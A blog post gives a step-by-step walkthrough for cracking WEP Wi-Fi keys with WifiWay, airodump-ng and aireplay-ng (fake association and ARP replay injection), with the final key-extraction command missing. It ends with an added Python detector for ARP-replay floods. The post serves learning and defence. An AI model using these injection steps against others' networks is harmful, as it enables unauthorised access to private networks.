Based on a professional need, I had to demonstrate that WEP can be cracked. Even though I 'knew' this could be done, I had never actually done it myself.
Note: This is only for research, learning, and security checking purposes. It shouldn't be used to crack networks owned by other people. Attacking and compromising networks (or other resources) is bad, and illegal.
Doing some research, I found that the wireless card of my Sony Vaio VGN N350FE (an Intel 3945ABG) didn't support certain operations under Linux, among them one needed to demonstrate this vulnerability.
If you read my previous posts, you'll see that this is not the first problem I have found with hardware.
It also isn't the first one I have found a solution for :-)
I found a howto at http://foro.seguridadwireless.net/index.php?topic=3227.0 that I used as a base.
These are the steps I followed to crack WEP.
We need the WifiWay Linux distribution, available at http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. We download the CD image and burn it.
We boot the notebook with WifiWay (it must be able to boot from the optical drive).
Once it has started, we start X:
We set the channel of the AP (Access Point) in the NIC.
echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel
We get the BSSID, the channel and the ESSID.
We stop it with CONTROL-C, and we set the BSSID (a hex number of 6 octets) in the NIC.
echo 'AP_BSSID' > /sys/class/net/wifi0/device/bssid
Once we do this, we start capturing.
airodump-ng -c CAPTURE_CHANNEL -w CAPTURE_FILE rtap0
We open a new window and set the rate to 2 Mbps:
echo '2' > /sys/class/net/wifi0/device/rate
We bring the NIC up.
ifconfig wifi0 up
We look up our own MAC address: it is the 12 hex digits shown after HWaddr in the ifconfig output.
We initiate a (fake) association with the AP.
aireplay-ng -1 0 -a AP_BSSID -h MAC_ADDRESS_WIFI -e AP_ESSID wifi0
We open another terminal and start injecting traffic:
aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h MAC_ADDRESS_WIFI wifi0
This should increase the number of data packets in the capture window (it takes a while before it starts increasing).
When we have over 100,000 data packets, we can extract the key by executing:
This should give us the key in hex format.
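From the defender's side, the injection step above has a very recognisable footprint: one station re-sends the same captured ARP request (same frame length, same WEP IV) hundreds of times per second, while the AP's rebroadcasts carry fresh IVs. The following detector is an added example, not part of the original post or of the aircrack-ng tools; the frame records it consumes are constructed here and would in practice come from a monitor-mode capture.

```python
from collections import Counter, defaultdict


def make_sample_frames():
    """Constructed sample of 802.11 data frames seen in monitor mode, as
    (timestamp_seconds, source_mac, frame_length, wep_iv). All values made up."""
    frames = []
    # Normal client: a few dozen frames with varied sizes and fresh IVs.
    for i in range(40):
        frames.append((i * 0.05, "aa:bb:cc:00:00:01", 120 + (i % 7) * 30, 0x100000 + i))
    # Station replaying one captured ARP request: same length, same IV, very high rate.
    for i in range(600):
        frames.append((1.0 + i * 0.001, "aa:bb:cc:00:00:02", 68, 0x0ABCDE))
    return frames


def detect_arp_replay(frames, bucket_s=1.0, threshold=100):
    """Flag stations that re-send an identical (length, IV) WEP data frame at
    least `threshold` times inside one time bucket, the footprint of an
    ARP-request replay flood used to pump IVs out of a WEP network."""
    # (source_mac, bucket_index) -> Counter of (frame_length, iv)
    buckets = defaultdict(Counter)
    for ts, src, length, iv in frames:
        buckets[(src, int(ts // bucket_s))][(length, iv)] += 1

    alerts = {}
    for (src, idx), counter in buckets.items():
        (length, iv), n = counter.most_common(1)[0]
        if n >= threshold:
            alerts.setdefault(src, []).append(
                {"bucket": idx, "len": length, "iv": iv, "count": n}
            )
    return alerts


if __name__ == "__main__":
    for src, hits in detect_arp_replay(make_sample_frames()).items():
        for hit in hits:
            print(f"{src}: {hit['count']} identical frames (len={hit['len']}, "
                  f"iv={hit['iv']:06x}) in bucket {hit['bucket']}")
```

Legitimate WEP clients never repeat an IV hundreds of times within a second, so a single alert from this check is worth an investigation; the same counters also show the IV exhaustion that makes WEP keys recoverable in the first place.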
I hope this is useful to you.